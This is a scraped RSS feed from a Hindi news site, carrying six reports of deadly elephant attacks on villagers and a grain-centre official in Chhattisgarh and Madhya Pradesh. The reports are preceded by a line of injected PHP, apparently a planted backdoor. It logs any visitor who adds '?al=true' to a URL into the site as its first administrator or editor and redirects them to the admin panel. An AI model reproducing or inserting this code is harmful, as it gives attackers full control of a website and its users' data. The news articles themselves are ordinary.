// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); elephant attack – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 05 Mar 2026 07:05:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.4 कोरबा में हाथी ने मंडी प्रभारी पर हमला कर उतारा मौत के घाट, पत्नी ने भागकर बचाई जान https://pratyushaashakinayikiran.com/?p=202530 Thu, 05 Mar 2026 07:05:00 +0000 https://pratyushaashakinayikiran.com/?p=202530 कोरबा.

छत्तीसगढ़ के कोरबा जिले से एक दर्दनाक घटना सामने आई है, जहां कुदमुरा उपार्जन केंद्र में देर रात एक हाथी के हमले में मंडी प्रभारी की मौत हो गई। वहीं मृतक की पत्नी ने किसी तरह भागकर अपनी जान बचाई। इस घटना के बाद पूरे इलाके में दहशत का माहौल है। जानकारी के अनुसार, घटना बुधवार देर रात करीब 2 बजे कोरकोमा क्षेत्र स्थित कुदमुरा उपार्जन केंद्र की है।

बताया जा रहा है कि उपार्जन केंद्र में लगातार धान चोरी की घटनाएं सामने आ रही थी। इसी कारण मंडी प्रभारी राजेश कुमार अपनी पत्नी के साथ केंद्र परिसर में अस्थायी झोपड़ी बनाकर रह रहे थे और धान की सुरक्षा की जिम्मेदारी निभा रहे थे। इस बीच देर रात एक हाथी उपार्जन केंद्र परिसर में घुस आया और झोपड़ी को नुकसान पहुंचाते हुए अंदर सो रहे राजेश कुमार पर हमला कर दिया। हमले में उनकी मौके पर ही मौत हो गई, जबकि उनकी पत्नी किसी तरह वहां से भागकर अपनी जान बचाई और ग्रामीणों को घटना की जानकारी दी। मृतक राजेश कुमार रजगामार क्षेत्र के निवासी बताए जा रहे हैं। घटना की सूचना मिलते ही वन विभाग की टीम मौके पर पहुंची और जांच शुरू कर दी गई है।

]]>
शहडोल के ब्यौहारी वन परिक्षेत्र में हाथियों के कुचलने से 2 लोगों की मौत https://pratyushaashakinayikiran.com/?p=157407 Mon, 19 May 2025 12:26:00 +0000 https://pratyushaashakinayikiran.com/?p=157407 शहडोल
 शहडोल जिले के उत्तर वन मंडल के ब्यौहारी वन परिक्षेत्र में जंगली हाथियों के हमले में दो मौतें हो गई हैं। जानकारी के अनुसार एक पुरुष और एक महिला की मौत हुई है। जंगली हाथी ने दोनों को कुचल दिया है। मौके पर वन अमला पहुंच गया और मामले की जांच की जा रही है। मालूम हो कि हाथियों का एक दल ब्यौहारी वन परिक्षेत्र में विचरण कर रहा है।

इसी दल के हाथी ने सोमवार को दो लोगों को कुचल दिया है। यह घटना वन परीक्षित गोदवाल के सनौसी बीट में हुई है। वन अधिकारियों ने बताया कि घटना हुई है और जांच पड़ताल की जा रही है कि किस कारण से मौत हुई है। अभी तक पूरी जानकारी इकट्ठा नहीं हो पाई है, वन विभाग जांच पड़ताल करने के बाद ही स्पष्ट कर पाएगा मौत कैसे हुई है।

हाथियों के कुचलने से ही हुई है मौत

ग्रामीणों के बताएं अनुसार हाथियों के कुचलने से ही मौत हुई है। ग्रामीणों ने कहा कि पिछले 2 साल से क्षेत्र में हाथियों का आना-जाना लगा हुआ है और खेती-बाड़ी को नुकसान पहुंचाने के साथ अब लोगों की जान भी लेने लगे हैं।

वन विभाग अपने स्तर से लोगों को हाथियों के नजदीक जाने से रोकता है और जागरूकता फैला रहा है, लेकिन इससे हाथियों पर अंकुश नहीं लगा है। हाथियों के दल जहां भी मन करता है उस गांव में घुस जाते हैं और लगातार नुकसान पहुंचा रहे हैं। इससे गांव के लोग परेशान हो गए हैं।

हाथी और मानव संघर्ष को रोकने के लिए वन विभाग ने योजना बनाई है और अपना प्रस्ताव सरकार को दिया है। अभी तक इस पर कोई काम शुरू नहीं हो पाया है। लगातार बढ़ रही हाथियों की हलचल से अब वन विभाग को स्थाई समाधान निकालने की जरूरत है। तभी गांव के लोगों की सुरक्षा इनसे की जा सकती है।

]]>
छत्तीसगढ़-बलरामपुर में पुलिया पर काम कर रहे थे मजदूरों पर हाथी का हमला, पति की मौत और पत्नी घायल https://pratyushaashakinayikiran.com/?p=99796 Sun, 17 Nov 2024 15:40:00 +0000 https://pratyushaashakinayikiran.com/?p=99796 बलरामपुर.

बलरामपुर-रामनुजगंज बीती रात बलरामपुर विकासखंड के चिलमा ग्राम के समीप सासु नदी में बना रहे पुलिया के पास क्षेत्र में हाथी आने के बाद वन विभाग की टीम के साथ सैकड़ों की संख्या में ग्रामीण एकत्रित थे। इस बीच दंपत्ति को लोगों के मना करने के बाद जंगल की ओर चल दिए। जिससे हाथी की चपेट में पति आ गया।

हाथी ने अपने सूंड से लपेटकर पति को पटक दिया। जिससे उसकी मौके पर ही मौत हो गई। वहीं पत्नी भी घायल हो गई। सूचना पर तत्काल एसडीओ वन रवि शंकर श्रीवास्तव सहित वन अमला पहुंचा। जानकारी के अनुसार, पस्ता गौठान जंगल के किनारे किनारे होते हाथियों का दल चिलमा की ओर जा रहा था। क्षेत्र में हाथी आने की खबर लोगों को लगते ही ग्रामीण वन विभाग के अमले के साथ सासु नदी पुलिया के पास सैकड़ों की संख्या में एकत्रित थे। इस बीच चमरा कोरवा उम्र 60 वर्ष अपनी पत्नी के साथ देर रात जंगल की ओर जाने लगा। वन विभाग का अमला एवं ग्रामीणों के द्वारा मना किया गया। उसके बाद भी वह जंगल ओर चला गया। जिससे वह हाथी के चपेट में आ गया। पत्नी घायल है। बताया जा रहा है कि आठ हाथियों का दल है। घटना सुबह तीन की बताई जा रही है। सूचना पर एसडीओ वन रविशंकर श्रीवास्तव सहित वन अमला मौके पर पहुंचा।

]]>
छत्तीसगढ़-रायगढ़ में हाथी के हमले में एक की मौत, डर के साये में गुजरी ग्रामीणों की रात https://pratyushaashakinayikiran.com/?p=91748 Wed, 30 Oct 2024 13:55:00 +0000 https://pratyushaashakinayikiran.com/?p=91748 रायगढ़.

छत्तीसगढ़ के रायगढ़ जिले में बीती रात हाथी के हमले से एक ग्रामीण की मौत हो गई। गांव में हाथी आने के बाद ग्रामीण युवक उसे भागने गया था। इसी दौरान यह घटना घटित हो गई। इस घटना की जानकारी मिलते ही वन विभाग की टीम मौके पर पहुंच कर आगे की कार्रवाई मे जुट गई है। मामला धरमजयगढ़ वन मंडल का है।

मिली जानकारी के मुताबिक, धरमजयगढ़ थाना क्षेत्र के अंतर्गत आने वाले ग्राम दुलियामुडा गांव में बीती रात नौ बजे एक हाथी गांव के करीब पहुंच गया था, जिसके बाद गांव के ग्रामीण हाथी को बस्ती से दूर भागने के प्रयास मे जुट गए थे, इसी बीच हाथी ने गांव के एक ग्रामीण युवा वेदराम कंवर 35 साल को कुचल कर मौत के घाट उतार दिया। यह घटना राजा जंगल के करीब घटित हुई है।

शव को भेजा गया अस्पताल
वन विभाग के एक कर्मचारी ने बताया की रात करीब सवा नौ बजे घटना की जानकारी मिलने के विभाग की टीम मौके पर पहुंच कर मृतक के शव को पोस्टमार्टम के लिए सिविल अस्पताल भेज दिया है। आज पोस्टमार्टम उपरांत शव परिजनों के सुपुर्द करते हुए पश्चात सहायता राशि दी जाएगी।

हाथी के करीब नहीं जाने की जाती है अपील
धरमजयगढ़ क्षेत्र के हाथी प्रभावित इलाकों मे वन विभाग के आलावा हाथी मित्र दल के सदस्य गाँव गाँव पहुंच कर हाथी मानव द्वन्द को रोकने लगातार ग्रामीणों को जागरूक करते आ रहें हैं, और किसी भी हाल मे हाथी के करीब नहीं जाने की अपील की जाती है, इसके बाद लापरवाही के कारण इस तरह की घटना घटित हो रही है।

लापरवाही बरत रहे ग्रामीण
हाथी प्रभावित ग्रामीण क्षेत्रों में देखा जा जाता है कि कुछ शरारती तत्व शराब के नशे में हाथियों को खदेडने उनके करीब तक पहुंच जाते हैं, पिछले दिनों कुछ ग्रामीणों के द्वारा हाथियों के दल को पत्थर मारकर भागने का वीडियो के आलावा ट्रेक्टर से हाथियों को भागने का भी वीडियो सामने आ चुका है।

]]>
छत्तीसगढ़-अंबिकापुर में दो ग्रामीणों पर हाथी ने किया हमला, एक की मौत https://pratyushaashakinayikiran.com/?p=54135 Tue, 23 Jul 2024 22:05:00 +0000 https://pratyushaashakinayikiran.com/?p=54135 अंबिकापुर।

ग्राम कृष्णनगर, धमनी निवासी राजाराम सिंह (45) अपने साथी लक्ष्मण सिंह (50) के साथ ग्राम चाकी गया था। वहां से दोनों देर रात जंगल के रास्ते पैदल ही घर लौट रहे थे। बगरा मोड़ के पास वे गोठान के पास सुस्ताने के लिए बैठे थे। मौके पर अकेले विचरण कर रहा हाथी पहुंच गया। हाथी ने लक्ष्मण सिंह को सूंढ़ से धक्का दिया तो वह गिर गया।

हाथी ने राजाराम सिंह को सूंढ़ से उठाकर पटक दिया एवं कुचल दिया।घटना की सूचना पर देर रात वन अमला मौके पर पहुंचा। क्षेत्र में दल से बिछड़ा दंतैल हाथी अकेले विचरण कर रहा है। घटना रामानुजगंज वन परिक्षेत्र की है।

साथी को आई चोटें —
धक्का दिए जाने से गिरने के बाद लक्ष्मण सिंह मौके से किसी तरह भागने में कामयाब हो गया। उसने बगरा पहुंच ग्रामीणों को हाथी के हमले की सूचना दी। ग्रामीणों ने वनविभाग को हाथी के पहुंचने की सूचना दी। रात में ही वनविभाग मौके पर पहुंच गया एवं हाथी से दूर रहने की सलाह देर मुनादी कराई। घायल लक्ष्मण सिंह को सामुदायिक स्वास्थ्य केंद्र में भर्ती कराया गया है।

दल से भटककर पहुंचा है हाथी –
रामानुजगंज रेंजर संतोष पांडेय ने बताया कि उक्त हाथी अपने दल से अलग होकर बगरा पहुंचा है। हाथी के पास के जंगल में मौजूद होने की आशंका को देखते हुए ग्रामीणों को जंगल में न जाने की सलाह दी गई है। शाम ढलने के बाद लोगों को बाहर न निकलने कहा गया है। बगरा सहित आसपास के गांवों में मुनादी कराई जा रही है। वनविभाग ने मृतक के शव को पोस्टमार्टम के लिए भेज दिया है। वहीं परिजनों को आर्थिक सहायता राशि भी प्रदान की गई है।

]]>
कोरबा-छत्तीसगढ़ में सड़क पार करते समय लोगों ने छेड़ा, हाथी ने तोड़ी बाइक और बाल-बाल बचा युवक https://pratyushaashakinayikiran.com/?p=39119 Sat, 08 Jun 2024 15:15:00 +0000 https://pratyushaashakinayikiran.com/?p=39119 कोरबा.

कोरबा जिले में तीन हाथी सड़क पार कर रहे थे इसी दौरान राहगीरों ने हल्ला मचाना शुरू कर दिया। जिससे गुस्साए हाथी ने सड़क पर जमकर उत्पात मचाया। जिसके चलते सड़क के दोनों तरफ यात्री बस समेत अन्य वाहनों की लंबी लाइनें लग गई। वहीं, हाथी के पास से एक बाइक सवार जा रहा था, हाथी का रौद्र रूप देख वह हड़बड़ी में बाइक से नीचे गिर गया।

उसने किसी तरह वहां से भागकर अपनी जान बचाई। जिसके बाद हाथी ने बाइक पर अपना गुस्सा निकाला। हाथी ने पटक-पटक कर बाइक को तोड़ दिया। हाथी का रौद्र रूप देखकर सभी लोग डर गए और वहां अफरा-तफरी का माहौल बन गया। हाथी आधे घंटे तक सड़क पर इधर से उधर धूमता रहा। हाथी कभी ट्रक को धक्का देता नजर आया तो कभी सड़क के दोनों तरफ वाहन की तरफ दौड़ता रहा। ये पूरा मामला कटघोरा वन मंडल के केंदई रेंज के कापा नावापारा का है। वन कर्मियों ने बताया कि जंगल के रास्ते से आ रहे तीन हाथी सड़क पार कर रहे थे। तभी लोगों ने हाथियों को देख हल्ला मचाना शुरू कर दिया। तीन हाथियों में से एक हाथी सड़क पर ही रूक गया और उसने जमकर उत्पात मचाया। घटना की सूचना मिलते ही वन विभाग की टीम मौके पर पहुंची और लोगों को समझाया लेकिन उसके बावजूद भी लोग अपनी हरकतों से बाज नहीं आ रहे थे। हाथी के करीब जाने का कोशिश कर रहे थे। किसी तरह हाथी का रेस्कयू कर जंगल की ओर खदेड़ा गया तब जाकर लोगों ने और वनकर्मियों ने राहत की सांस ली।

कटघोरा डीएफओ निशांत कुमार ने बताया कि 40 हाथियों का झुंड विचरण कर रहा है, जहां कुछ हाथी झुंड से अलग हो जाते हैं। उसके बाद फिर मिल जाते है ये जो हाथी था वो दंतैल था, जो काफी आक्रामक होते हैं। आसपास गांव में मुनादी कराई जा रही है कि वह जंगल की ओर न जाएं।

]]>